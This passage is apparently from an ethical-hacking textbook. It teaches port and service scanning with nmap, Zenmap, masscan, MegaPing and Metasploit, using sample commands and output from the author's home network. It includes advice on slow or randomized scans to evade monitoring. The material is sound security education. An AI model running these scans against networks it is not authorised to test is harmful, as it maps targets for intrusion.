Since there is no defined response, port scanners have to make a best guess. If there is no response to a probe message, port scanners don't assume the port is closed because it may not be. Not only may the application just not have responded, but it's possible the UDP message was lost in transmission, since nothing in the protocol ensures that it gets from end to end. Because either is possible, the probe messages will be re-sent. There is a delay of some small period of time between each message. Sending multiple messages with delays between them can cause significant UDP port scans to take quite a bit more time than a TCP scan. As noted earlier, port scanners may send ICMP echo requests to targets before running a port scan. There isn't much point in sending thousands of messages to a host that isn't there. This behavior can be controlled, depending on the port scanner being used.

Nmap

The de facto port scanner is nmap, short for network mapper. After all, if it's good enough for Carrie-Anne Moss in The Matrix Reloaded and Rihanna in Ocean's 8, it should be good enough for me or you. This is a program that has been around since 1997 and has become so commonly used that other port scanners implement the same command-line parameters because they are so well known. It isn't just a port scanner, though; its primary role and other functions are just extensions of the core purpose of nmap. Nmap can perform UDP scans as well as multiple types of TCP scans when it comes to port scanning. In addition, nmap will detect operating system types, applications, and application versions. Perhaps more significantly, nmap supports running scripts. These scripts allow anyone to extend nmap's functionality. The scripting engine, powered by the Lua programming language, has modules that scripts can be built on top of to make the job of probing systems much easier.

TCP Scanning

As it's the most detailed and complex type of scanning done, I'll cover the different types of TCP scans that nmap can perform. First, we know that transport protocols use 2 bytes for the port number in their headers. This means there are 65,536 possible ports (0–65535). Scanning that many ports, especially considering that the vast majority of them aren't used by listening applications, is very time-consuming. To be efficient, nmap will scan only about 1,000 ports by default, though you can specify any ports for nmap to scan that you would like. These 1,000 ports are the ones that are most likely to have a listening service.

There are many types of TCP scanning. One of the first ones to look at is the SYN scan. This is sometimes called a half-open scan, because connections are left half open. nmap will send a SYN message to the target. If the port is open, it responds with a SYN/ACK message, and nmap will respond to that with a RST message, indicating it doesn't want to continue with the connection. If the port is closed, the target system will respond with its own RST message. In the following code listing, you can see a SYN scan, which is called with -sS as the parameter. Then, you need a target. This scan is a single IP address, but you can also specify a range or a network block.

SYN Scan with nmap

    $ nmap -sS 192.168.86.32
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 19:01 MDT
    Nmap scan report for billthecat.lan (192.168.86.32)
    Host is up (0.022s latency).
    Not shown: 500 closed ports, 495 filtered ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    88/tcp   open  kerberos-sec
    445/tcp  open  microsoft-ds
    548/tcp  open  afp
    5900/tcp open  vnc
    MAC Address: AC:87:A3:36:D6:AA (Apple)

    Nmap done: 1 IP address (1 host up) scanned in 3.69 seconds

To demonstrate the use of a network block as a target, we can make use of a full connect scan. Rather than a RST as the response to the SYN/ACK, nmap will complete the connection and then tear it down once the connection is complete. What you will see in the following code listing is the use of a CIDR block as the target address. This means nmap will scan the entire subnet. You will also notice that the ports are specified. Rather than just defaulting to the 1,000 ports nmap will usually scan, we're only going to get hosts that have port 80 and 443 open. There could be many hosts on the network that won't respond to a scan like this.

Nmap Full Connect Scan

    $ nmap -sT -p 80,443 192.168.86.0/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 20:44 MDT
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    Nmap scan report for testwifi.here (192.168.86.1)
    Host is up (0.011s latency).
    PORT    STATE  SERVICE
    80/tcp  open   http
    443/tcp closed https
    MAC Address: 18:D6:C7:7D:F4:8A (Tp-link Technologies)

    Nmap scan report for 192.168.86.2
    Host is up (0.011s latency).
    PORT    STATE  SERVICE
    80/tcp  closed http
    443/tcp closed https
    MAC Address: 68:05:CA:46:70:88 (Intel Corporate)

    Nmap scan report for 192.168.86.11
    Host is up (0.022s latency).
    PORT    STATE  SERVICE
    80/tcp  closed http
    443/tcp closed https
    MAC Address: C8:DB:26:02:EE:CC (Logitech)

    Nmap scan report for harmonyhub.lan (192.168.86.12)
    Host is up (0.014s latency).
    PORT    STATE  SERVICE
    80/tcp  closed http
    443/tcp closed https
    MAC Address: C8:DB:26:02:89:62 (Logitech)

    Nmap scan report for myq-d9f.lan (192.168.86.20)
    Host is up (0.026s latency).
    PORT    STATE  SERVICE
    80/tcp  open   http
    443/tcp closed https
    MAC Address: 64:52:99:54:7F:C5 (The Chamberlain Group)

There are two things you may note in the output. First, we don't know what the application is. All we know is the protocol that is being used. Of course, we assume it's a web server, but which one? Even if we knew what the operating system is, we can't assume which application is being used as the web server. The second thing to notice is that along with the MAC address, you get the vendor. There is nothing special here. nmap looks up the organizationally unique identifier (OUI) part of the MAC address from a database and presents the result of the lookup.

There are additional TCP scans that nmap can run. The other scans make use of unexpected input as a way of potentially getting different responses. For example, the following code listing is something referred to as an Xmas scan. The reason for that is that the packets being sent have the FIN, PSH, and URG flags set, which makes the packet look lit up like a Christmas (or Xmas) tree. What you will likely notice quickly is that we don't get an indication about open ports here, as we did in the preceding code. Instead, nmap is telling us that the port is either open or filtered. The reason for this is that with ports that are closed, the system responds with a RST. Ports that are open don't respond at all because this is not a legal packet from the perspective of the protocol. If nmap doesn't get any response, it's not clear whether it's because a network device dropped the message or if the system just didn't respond to an illegal message.

Running an Xmas Scan with Nmap

    $ nmap -sX 192.168.86.32
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 20:58 MDT
    Nmap scan report for billthecat.lan (192.168.86.32)
    Host is up (0.0076s latency).
    Not shown: 995 closed ports
    PORT     STATE         SERVICE
    22/tcp   open|filtered ssh
    88/tcp   open|filtered kerberos-sec
    445/tcp  open|filtered microsoft-ds
    548/tcp  open|filtered afp
    5900/tcp open|filtered vnc
    MAC Address: AC:87:A3:36:D6:AA (Apple)

    Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds

The same ports show up here as with the SYN scan earlier. The only difference is that nmap can't specifically determine whether the port is open or filtered. Other scans, such as the Null scan where no flags are set, will also show results as being open or filtered for the same reason. The FIN scan also uses an unexpected set of flags since the FIN flag should only be sent in cases where there is an established connection. You will also get open or filtered from the FIN scan.

UDP Scanning

UDP scanning is much more straightforward than TCP scanning. There are no options for UDP scanning. nmap sends out UDP messages and then watches whatever responses may come back. The expectation is that if a port is closed, the system will respond with an ICMP port unreachable message. If a port is open, the service may respond with something or it may just not respond at all. In the following code, you can see a UDP scan run with nmap. You'll notice on the command line that a new parameter has been added, -T4. This sets the throttle rate. By default, the throttle is set at 3, which is a common rate of message transmission. If you want it faster, you can go up to 5. If you want it to go slower, potentially to avoid detection, you can turn it down to 1. Since this is on my local network and I don't care how fast it transmits, I have the throttle rate set for 4.

    $ nmap -sU -T4 192.168.86.32
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 08:03 MDT
    Nmap scan report for billthecat.lan (192.168.86.32)
    Host is up (0.0053s latency).
    Not shown: 750 closed ports, 247 open|filtered ports
    PORT     STATE SERVICE
    123/udp  open  ntp
    137/udp  open  netbios-ns
    5353/udp open  zeroconf
    MAC Address: AC:87:A3:36:D6:AA (Apple)

    Nmap done: 1 IP address (1 host up) scanned in 5.21 seconds

Figure 5.2 will show you what these requests look like after capturing them in Wireshark, a packet capturing program. At the top of the list of packets are the probe requests from the system running nmap. If you look at the packet decode in the bottom pane, you will see there is no data in the packet. The UDP header is the 8 bytes expected for a UDP header and then there is no payload. The bottom of the list of packets shows the ICMP port unreachable messages from the target host.

FIGURE 5.2 UDP scan from Wireshark

You can compare the time that it takes to perform the different scans. The SYN scan took a bit over three seconds, while the UDP scan took just over five seconds. You'll also notice that there are about 1,000 ports scanned for UDP as well. We still have the problem, though, of not knowing for sure what applications are running behind these ports. This is also something nmap can take care of for us.

Port Scanning

Download a copy of nmap. You can use the command-line version or the GUI version with Zenmap. Even if you have only a single computer, you should have a router on your network as well. If you have nothing else, you can scan the IP address that belongs to your router, also known as the default gateway. Try running both TCP scans as well as UDP scans. Try two different types of TCP scans to see if you get any different results.

Detailed Information

We can use nmap to address the problem of not knowing the application. We can use version scanning. What nmap does when we run a version scan (-sV) is connect to the port and, as necessary, issue the correct protocol commands to get the application banner back. The banner is protocol-specific and may include such information as the software name and version. In the following code listing, you can see not only the protocol, as you've seen before, but also the software being used and the version number. For port 22, the system is running OpenSSH version 7.4. The 2.0 in parentheses indicates it is version 2.0 of the protocol. This is something that the service indicates in the banner.

Nmap Version Scan

    $ nmap -sV 192.168.86.32
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 20:51 MDT
    Nmap scan report for billthecat.lan (192.168.86.32)
    Host is up (0.0083s latency).
    Not shown: 995 closed ports
    PORT     STATE SERVICE      VERSION
    22/tcp   open  ssh          OpenSSH 7.4 (protocol 2.0)
    88/tcp   open  kerberos-sec Heimdal Kerberos (server time: 2018-07-15 02:51:39Z)
    445/tcp  open  microsoft-ds?
    548/tcp  open  afp          Apple AFP (name: billthecat; protocol 3.4; OS X 10.9 - 10.11; Macmini7,1)
    5900/tcp open  vnc          Apple remote desktop vnc
    MAC Address: AC:87:A3:36:D6:AA (Apple)
    Service Info: OSs: OS X, Mac OS X; CPE: cpe:/o:apple:mac_os_x:10.9, cpe:/o:apple:mac_os_x

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 35.23 seconds

nmap knows the details about the services because the application provides the information when nmap connects. Different applications and protocols will provide different sets of information, which means nmap has to understand how to speak these protocols to get this information in some cases. As an example, with web servers such as Apache, the system administrator is in charge of how much should be provided in the headers going back to the client. Apache can provide not only the name of the product, Apache, but also the version of the software and the modules that are loaded as well as the versions of the modules.

You may also want to know what operating system is running on the remote system. This is also something nmap can take care of, with an operating system scan. To make a determination about the operating system, nmap has a database of fingerprints. The fingerprints contain details about how each operating system behaves, including how the IP identification field is generated, the initial sequence number, the initial window size, and several other details. To identify the operating system, nmap has to find at least one open port and one closed port. In the following code, you can see an operating system scan. You will notice that even though I didn't indicate a TCP scan, nmap performed one. The same ports that were found to be open before have been identified again. You will also notice that nmap scanned two different systems. This is another way nmap can be told to scan systems rather than ranges or network blocks. If you provide multiple systems on the command line, nmap will perform the same scan on each of the systems specified.

Operating System Scan with Nmap

    $ nmap -O 192.168.86.32 192.168.86.30
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 20:54 MDT
    Nmap scan report for billthecat.lan (192.168.86.32)
    Host is up (0.0039s latency).
    Not shown: 995 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    88/tcp   open  kerberos-sec
    445/tcp  open  microsoft-ds
    548/tcp  open  afp
    5900/tcp open  vnc
    MAC Address: AC:87:A3:36:D6:AA (Apple)
    OS details: Apple Mac OS X 10.7.0 (Lion) - 10.12 (Sierra) or iOS 4.1 - 9.3.3 (Darwin 10.0.0 - 16.4.0)
    Network Distance: 1 hop

    Nmap scan report for 192.168.86.30
    Host is up (0.0040s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    111/tcp  open  rpcbind
    3128/tcp open  squid-http
    MAC Address: 70:4D:7B:61:52:6B (Asustek Computer)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop

    OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 2 IP addresses (2 hosts up) scanned in 9.07 seconds

One thing to keep in mind when you do an operating system scan is that nmap relies on fingerprints, and unlike people, the same fingerprint can match multiple operating systems. As long as nothing in the network stack has changed, you will find that multiple versions of a commercial operating system will match the same fingerprint. You can see this is the case with Apple Mac OS X, now known as macOS. There are several versions that match the same fingerprint, including some versions of iOS. The version running on the target does fall into the range indicated by nmap.

One other thing to keep in mind is that nmap tracks the operating system. The operating system is really the kernel—the piece of software that manages the hardware, manages memory, and manages processes. All the other stuff that helps the user interact with the operating system to do user-useful things is in the operating environment, to help draw distinctions. In the case of Linux, the same kernel may be used across multiple distributions, but since the only thing being identified is the kernel, there is no way to know what distribution. nmap can't tell you Ubuntu versus CentOS, for example. It only knows the version of the Linux kernel you are running.

Scripting

We've seen a lot of the functionality that nmap has. Even with all that functionality, we can go beyond. nmap includes a scripting engine, which allows you, as an nmap user, to extend the functionality in any way that you would like. It's not entirely about extending the functionality yourself, though. The scripting engine is there, but it's not completely up to you to determine what you want to do with it. There are hundreds of scripts available with the latest version of nmap, and the number continues to grow. They are grouped into categories, which currently are auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln. You can have nmap run all the scripts from a particular category. The following code is nmap being asked to run all the scripts in the discovery category.

Nmap Discovery Scripts

    $ nmap -sS --script=discovery 192.168.86.0/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 13:28 MDT
    Pre-scan script results:
    | broadcast-igmp-discovery:
    |   192.168.86.22
    |     Interface: eth0
    |     Version: 2
    |     Group: 224.0.0.251
    |     Description: mDNS (rfc6762)
    |   192.168.86.28
    |     Interface: eth0
    |     Version: 2
    |     Group: 224.0.0.251
    |     Description: mDNS (rfc6762)
    |   192.168.86.32
    |     Interface: eth0
    |     Version: 2
    |     Group: 224.0.0.251
    |     Description: mDNS (rfc6762)
    |   192.168.86.47
    |     Interface: eth0
    |     Version: 2
    |     Group: 224.0.0.251
    |     Description: mDNS (rfc6762)

To use a script, you have to pass the --script= parameter followed by the name of the script you want to run. In addition to using the name of the script, you can indicate the category, as I did in the preceding code. On a Linux system, you will probably find all the installed scripts in /usr/share/nmap/scripts. On a Windows system, you will find the scripts in the Program Files directory where nmap is installed. You'll notice that the file extension for these scripts is .nse for "nmap scripting engine." Scripts are written in the Lua language, and each file can be opened and read, possibly to get details about the function of the script. If you'd rather use nmap to get information about the script, you can use --script-help, passing in the name of the script. As an example, let's say you want to get the details about http-waf-detect.nse. Here you can see how to call nmap to get help and the start of the response from nmap.

Nmap Script Help

    $ nmap --script-help=http-waf-detect.nse
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 13:42 MDT

    http-waf-detect
    Categories: discovery intrusive
    https://nmap.org/nsedoc/scripts/http-waf-detect.html
      Attempts to determine whether a web server is protected by an IPS (Intrusion
      Prevention System), IDS (Intrusion Detection System) or WAF (Web Application
      Firewall) by probing the web server with malicious payloads and detecting
      changes in the response code and body.

Another way of finding this information would be to just go to the script itself. When you are writing nmap scripts, there are variables that get set, and one of those is the description. This is the variable that gets printed when script-help is called. Additionally, you'll notice there is a section on usage, indicating how the script should be called from nmap. You'll also notice the require statements at the top. This is where the functionality from the nmap scripting engine is pulled in. These modules are needed for the script to be called from nmap.

Top of the http-waf-detect.nse File

    local http = require "http"
    local shortport = require "shortport"
    local stdnse = require "stdnse"
    local string = require "string"
    local table = require "table"

    description = [[
    Attempts to determine whether a web server is protected by an IPS (Intrusion
    Prevention System), IDS (Intrusion Detection System) or WAF (Web Application
    Firewall) by probing the web server with malicious payloads and detecting
    changes in the response code and body.

    To do this the script will send a "good" request and record the response,
    afterwards it will match this response against new requests containing
    malicious payloads. In theory, web applications shouldn't react to malicious
    requests because we are storing the payloads in a variable that is not used by
    the script/file and only WAF/IDS/IPS should react to it.
    If aggro mode is set, the script will try all attack vectors (More noisy)
    ]]

    ---
    -- @usage
    -- nmap -p80 --script http-waf-detect
    -- nmap -p80 --script http-waf-detect --script-args="http-waf-detect.aggro,http-waf-detect.uri=/testphp.vulnweb.com/artists.php" www.modsecurity.org
    --
    -- @output
    -- PORT   STATE SERVICE
    -- 80/tcp open  http
    -- |_http-waf-detect: IDS/IPS/WAF detected

In addition to calling individual scripts, you can have nmap select multiple scripts using wildcards. If, for example, you wanted to run all the scripts related to the Server Message Block (SMB) protocol version 2, you could just indicate that the scripts you want to run are named smb2*. This means any script that starts with smb2 will get run. There are three that will get run if the SMB ports are found to be open. You can see calling the script and the results in the following code listing. You'll notice that the port scan identified port 445 as being open. This is the port used for the Common Internet File System (CIFS), which is an implementation of SMBv2. This is the port that triggered the running of the scripts, meaning that when nmap found the port to be open, it identified all the scripts that had registered that port and nmap ran those scripts.

Nmap Using Wildcards

    $ nmap -sS --script "smb2*" -T4 192.168.86.32
    Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-03 15:32 MDT
    Nmap scan report for billthecat.lan (192.168.86.32)
    Host is up (0.00024s latency).
    Not shown: 500 closed ports, 495 filtered ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    88/tcp   open  kerberos-sec
    445/tcp  open  microsoft-ds
    548/tcp  open  afp
    5900/tcp open  vnc
    MAC Address: AC:87:A3:36:D6:AA (Apple)

    Host script results:
    | smb2-capabilities:
    |   2.10:
    |     Leasing
    |     Multi-credit operations
    |   3.00:
    |     Leasing
    |     Multi-credit operations
    |     Encryption
    |   3.02:
    |     Leasing
    |     Multi-credit operations
    |_    Encryption
    | smb2-security-mode:
    |   2.10:
    |_    Message signing enabled and required
    |_smb2-time: Protocol negotiation failed (SMB2)

    Nmap done: 1 IP address (1 host up) scanned in 3.44 seconds

As you can see, you can use the nmap scripts to collect a lot of information about different services. As of this writing, there are more than 600 scripts. Out of that 600 plus, more than 30 of them are targeted specifically at identifying if a server is potentially exposed to a vulnerability known with a Common Vulnerabilities and Exposures (CVE) identifier. Other scripts will identify systems that are vulnerable to other exposures. As another example, there is a script that looks for the Decrypting RSA with Obsolete and Weakened eNcryption (DROWN) vulnerability in servers that are running Secure Sockets Layer (SSL) version 2. This was a serious vulnerability, and it can be identified by interacting with the system using SSL.

If you have some programming experience, you may find that extending nmap with your own scripts is a fairly easy process. Since all the NSE scripts are in plain text, you can use any of them as a starting point or to grab code samples that you can put together to create your own script. Keep in mind that while nmap is a port scanner and can identify open ports, the scripting engine is used to perform deeper interactions with the application. The scripts can also make programmatic determinations based on the responses that are provided by the service. The scripting engine modules not only provide functionality to interact with the services, including registering ports with nmap so the script is called when the identified port is found to be open, but there are also modules for output that is presented back by nmap when the script is complete.

Zenmap

You can use the command line to do all your nmap scans, but you don't have to if you prefer to use a GUI. For years, you had to use the command line because that's all there was available. There were attempts to create GUIs to overlay on top of nmap, and then one year, under Google's Summer of Code project, a GUI called Zenmap was created, and it has remained the GUI version of nmap for years. It is, as suggested, an overlay for nmap. This means that what you do in Zenmap runs nmap underneath, and then the results from nmap are available in the GUI. With Zenmap, you don't have to think so much about the type of scan you are performing in the sense of the list of scan types I mentioned earlier. Instead, as you can see in Figure 5.3, you select a scan by name in a pulldown.

FIGURE 5.3 Zenmap scan types

You will also see the command box. Selecting the different scan types changes the command line. Instead of types like SYN scan or Full Connect scan, you will select from intense scan, quick scan, regular scan, and others. With the intense scans, the throttle is set high in order to complete the scan faster. A regular scan doesn't change the throttle speed. Interestingly, a slow comprehensive scan also turns up the throttle. If you don't want to use any of the ones that are provided in the interface, you can change the command line to anything you want and still run it.

The advantage to using Zenmap isn't being able to select canned scan settings but instead to visualize the output. If you use the command line, you get a lot of text output, and then you have to extract what you need from that. Using Zenmap, you can see all the hosts that were identified on the left side. You will also get a small icon indicating the operating system type, assuming you performed a scan that detected the operating system. Of course, you'll also get the regular nmap output if you'd rather look at that. It may be easier, though, to let Zenmap organize the results for you. Figure 5.4 shows another way of visualizing the output. Again, one of the important aspects of doing a port scan is to identify the services and, subsequently, the applications. On the left side in Figure 5.4, clicking the Services button shows the list of all the services that were identified in the scan. Selecting one of the services will bring up a list of all the hosts that were running that service during the scan. If you look on the right side of Figure 5.4, you will see the list of hosts, but you will also see, in some cases, the application and version running on that host.

FIGURE 5.4 Zenmap service output

Another useful capability of Zenmap is its ability to save scans. Okay, it goes beyond the ability to save scans. Ultimately, you could save a scan in nmap. What Zenmap will do is compare two saved scans. This means you can get a baseline of a network and then check it again later to see what may have changed. If you are testing the same network multiple times, being able to get the historic differences will be useful. You'll get not only hosts that are different but also services that are different. By default, Zenmap will save scans in XML format. Since XML is a text-based format, you could get the differences between two XML files yourself, but it's easier to have a tool that will consume XML and then compare it node by node to get more than just the text differences. Zenmap will do that for you.

While I generally prefer to use the command line, there are times when GUI tools are just far more useful. I'd prefer to run scans from the command line, but the visualization and organizational capabilities of Zenmap make it worth using. Of course, Zenmap doesn't require that you do the initial scans in Zenmap. You could run the scan in nmap, save the output in XML format, and then open the XML file in Zenmap and get all the goodness that we've been talking about here.

masscan

Have you ever wanted to just port scan the entire Internet to identify all the web servers that respond? Of course, if you were going to do that, you'd want to do it flat-out, as fast as you possibly can. According to masscan's developer, Robert Graham, that was essentially the purpose for masscan. At its core, it's a port scanner. It does some of the same things that nmap does. The difference is that it was developed to go as fast as your system, and the network connection you have, will allow it to go. Since nmap has become the de facto port scanner and people who are inclined to do port scans know how nmap works, masscan uses the same sorts of command-line parameters as nmap.

Port scanning isn't really fancy, when you come down to it. You tell the port scanner what ports you want to scan and the systems you want to scan. In the following code, you can see running masscan to identify all the web servers. In terms of how it relates to nmap, you'll notice that the parameter to indicate ports is the same. You'll also notice that where I left the type of scan off, masscan let me know it had filled in the -sS for me.

masscan Identifying Web Servers

    $ masscan --rate=100000 -p80,443 192.168.86.0/24
    Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2021-01-03 02:26:51 GMT
     -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
    Initiating SYN Stealth Scan
    Scanning 256 hosts [2 ports/host]
    Discovered open port 80/tcp on 192.168.86.250
    Discovered open port 80/tcp on 192.168.86.1
    Discovered open port 80/tcp on 192.168.86.35
    Discovered open port 443/tcp on 192.168.86.44
    Discovered open port 443/tcp on 192.168.86.245
    Discovered open port 80/tcp on 192.168.86.247
    Discovered open port 80/tcp on 192.168.86.38
    Discovered open port 80/tcp on 192.168.86.44

The most significant difference is the addition of the rate parameter. This is in packets per second, and you can use fractional rates, in a decimal form, such as 0.5, to indicate a single packet every 2 seconds. The parameter provided here requests 100,000 packets per second. Your mileage will vary here, based on what your target is, how much bandwidth you have available, and how fast your system and network interface can generate and send packets to the network. You may also have noticed that masscan forced the use of --randomize-hosts, which means that the IP addresses tested would not be in numerical order. Instead, the order will be randomized. The idea behind randomizing hosts is to potentially get around network monitoring tools. If you scan in order, it is fairly clear that a scan is happening. Randomizing scanning makes it a little less obvious what is happening. This may be especially true if you slow the rate down.

masscan doesn't just do port scanning, though, even really fast scanning. It can also do some information gathering, much like nmap can. You can request that masscan grab banners. This is done using the --banners parameter.

Getting Banners with masscan

    $ masscan -sS --banners --rate=100000 -p80,443 192.168.86.0/24
    Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2021-01-03 03:25:51 GMT
     -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
    Initiating SYN Stealth Scan
    Scanning 256 hosts [2 ports/host]
    Discovered open port 80/tcp on 192.168.86.162
    Discovered open port 80/tcp on 192.168.86.1
    Discovered open port 80/tcp on 192.168.86.160
    Discovered open port 80/tcp on 192.168.86.250
    Discovered open port 80/tcp on 192.168.86.44
    Discovered open port 80/tcp on 192.168.86.35
    Discovered open port 443/tcp on 192.168.86.245
    Discovered open port 80/tcp on 192.168.86.196
    Discovered open port 80/tcp on 192.168.86.247
    Banner on port 80/tcp on 192.168.86.35: [http] HTTP/1.1 200 OK\x0d\x0aConnection: close\x0d\x0aContent-Type: text/html\x0d\x0aCache-Control: no-cache\x0d\x0aExpires: -1\x0d\x0a\x0d
    Banner on port 80/tcp on 192.168.86.35: [title] Redirect to Login

You'll notice that only one of the systems shows headers, and out of those headers, there isn't a server type. The same server suggests that there is a redirect to a login page. Running the same scan with nmap returns server types. masscan doesn't have the same capabilities as nmap, including a lack of support for additional scan types, such as the unexpected TCP scans like Xmas, FIN, and ACK. It also doesn't support UDP scans. However, if you want all that functionality, you can use nmap. It's free and more than capable for those sorts of scans. What masscan gets you is the ability to indicate what rate you want to scan at and the ability to perform very fast scans.

Masscan Scanning

Scan the same host(s) as you did with nmap. Identify any differences in results. Try timing the two programs and see which one is faster.

MegaPing

We've looked at MegaPing before for its capability to perform ping sweeps. As noted earlier, MegaPing has a number of capabilities, including the ability to run port scans. These are not just run-of-the-mill scans, however. You'll remember that nmap scans about 1,000 ports by default. These are commonly used ports. You can certainly select other ports if you want. One thing MegaPing provides us with that we don't get with nmap is some preselected port collections. You can see the drop-down in Figure 5.5 that provides you with different selections for ports. One of these is Hostile Ports, which are ports that are commonly misused as well as ports that may commonly be used by Trojan horse programs and other malicious software (malware). At the bottom, you will see the list of ports that are included in the scan type.

To run a scan in MegaPing, you select Port Scanner on the left side of the interface. Then you need to add your targets for your scan. One downside to MegaPing is that it doesn't accept a CIDR block as a target. It also doesn't accept a range of addresses. If you want to scan multiple IP addresses, you need to add them in. You'll see the box in the middle where you can add the addresses and then select the ones you want to scan. If you just want to scan a single address, you enter it into the box below Destination Address List. Then you just click Start. Figure 5.6 shows the results of a scan of hostile ports.

FIGURE 5.5 MegaPing scan types

One thing you may notice when you look at the results is that there are common ports listed as being open. You'll see in the note alongside ports like 80 (www) that they are elevated ports. These are ports that have to be opened with administrative privileges. This means the ports will be targeted by attackers because compromising the application behind the port will immediately give the attacker administrative privileges. Another scan type is Authorized Ports, which will scan just the range of ports where applications are expected to reside. Other ports are considered to be ephemeral, meaning they are assigned to client applications as source ports when they start a conversation with a server.

One thing to note about MegaPing is that, while it has a load of functionality, it is commercial software. There is a fully functional evaluation version, but it does require you to wait while the license message shows when you start up the application.

FIGURE 5.6 MegaPing scan reports

Metasploit

While Metasploit is known primarily for being an exploit framework, which you turn to when you want to start exploiting services, meaning you want to get unauthorized access to the service, there are thousands of modules available that are not exclusively about exploiting services. We can use Metasploit for port scanning. Just to give you a sense of the types of port scanning we can do, the following is a list of the modules, at the time of this writing, available in Metasploit. This was obtained using msfconsole, which is one of the ways you can access Metasploit over the command line.

    msf6 > search portscan

    Matching Modules
    ================

       #  Name                                              Disclosure Date  Rank    Check  Description
       -  ----                                              ---------------  ----    -----  -----------
       0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
       1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
       2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
       3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
       4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
       5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
       6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
       7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner

You can see that we can use some of the same techniques we were using in nmap. Where nmap uses command-line switches, even if you are using Zenmap, Metasploit is a little more interactive. You set parameters or variables to provide the module you are using with the information needed to get the module to scan the right network in the way you want to scan it. Following is the output from a scan session using msfconsole. First, you need to use the module, which is expressed as a path. One reason it is expressed as a path is because it's stored as a path. The module named syn is just a file named syn.rb in your filesystem, because it's a Ruby script that makes use of the library functions provided by Metasploit. Once you have loaded the module, you can start setting parameters. When performing a port scan, you may only need to set the remote hosts (RHOSTS) parameter, unless you are targeting specific ports.

    msf6 > use scanner/portscan/syn
    msf6 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.4.0/24
    RHOSTS => 192.168.4.0/24
    msf6 auxiliary(scanner/portscan/syn) > show options

    Module options (auxiliary/scanner/portscan/syn):

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       BATCHSIZE  256              yes       The number of hosts to scan per set
       DELAY      0                yes       The delay between connections, per thread, in milliseconds
       INTERFACE                   no        The name of the interface
       JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
       PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
       RHOSTS     192.168.4.0/24   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
       SNAPLEN    65535            yes       The number of bytes to capture
       THREADS    1                yes       The number of concurrent threads (max one per host)
       TIMEOUT    500              yes       The reply read timeout in milliseconds

    msf6 auxiliary(scanner/portscan/syn) > set INTERFACE en0
    INTERFACE => en0
    msf6 auxiliary(scanner/portscan/syn) > run

Once you have your ports selected and your hosts selected, which can be an entire block, as used here, or a list of hosts or even a single host, you can run the module. Metasploit will execute the Ruby script and present the results. Following is a selection of the results. One advantage to running the port scan in Metasploit is it will maintain the results in a database that you can pull back in subsequent runs of the program. You don't have to keep running the scan just because you exited msfconsole and started it back up again.

    msf6 auxiliary(scanner/portscan/syn) > run

    [+] TCP OPEN 192.168.4.10:22
    [+] TCP OPEN 192.168.4.15:22
    [+] TCP OPEN 192.168.4.20:22
    [+] TCP OPEN 192.168.4.99:22
    [+] TCP OPEN 192.168.4.101:22
    [+] TCP OPEN 192.168.4.136:22
    [+] TCP OPEN 192.168.4.183:22
    [+] TCP OPEN 192.168.4.1:53
    [+] TCP OPEN 192.168.4.178:53
    [+] TCP OPEN 192.168.4.196:53
    [+] TCP OPEN 192.168.4.202:53

Of course, you can also run nmap from inside msfconsole, and Metasploit will still keep track of the results for you in the database. You'll get the same results no matter which approach you take because the rules of network protocols are universal, and if there is an application, there is an application, regardless of what program is sending a connection request to it.

Vulnerability Scanning

Knowing open ports and even applications that are listening on those ports is a good start. You can then start hunting and pecking at those ports after doing a lot of research about what vulnerabilities may exist within those applications. You could also just find a lot of exploits and start throwing them at the applications on the open ports. This may be a simple way of checking to see if there are vulnerabilities. You just check all the exploits you can find against your target. There are a few issues with that approach, however. The first is that you may end up causing failures on your target systems where you may not mean to. Blind testing can lead to unexpected results, and one of your objectives, from an ethical standpoint, is to cause no harm. Certainly security testing of any type can lead to unexpected results and failures. However, your job is to control it as best you can and to ensure that your client or employer is aware of the possible ramifications of your testing. It wouldn't be very professional to tell your client that you're just going to throw a lot of exploits at their system without any idea what the impact would be and that they may experience outages as a result. Your job is to control your testing—to be knowledgeable about what you are doing and what the possible outcomes are.

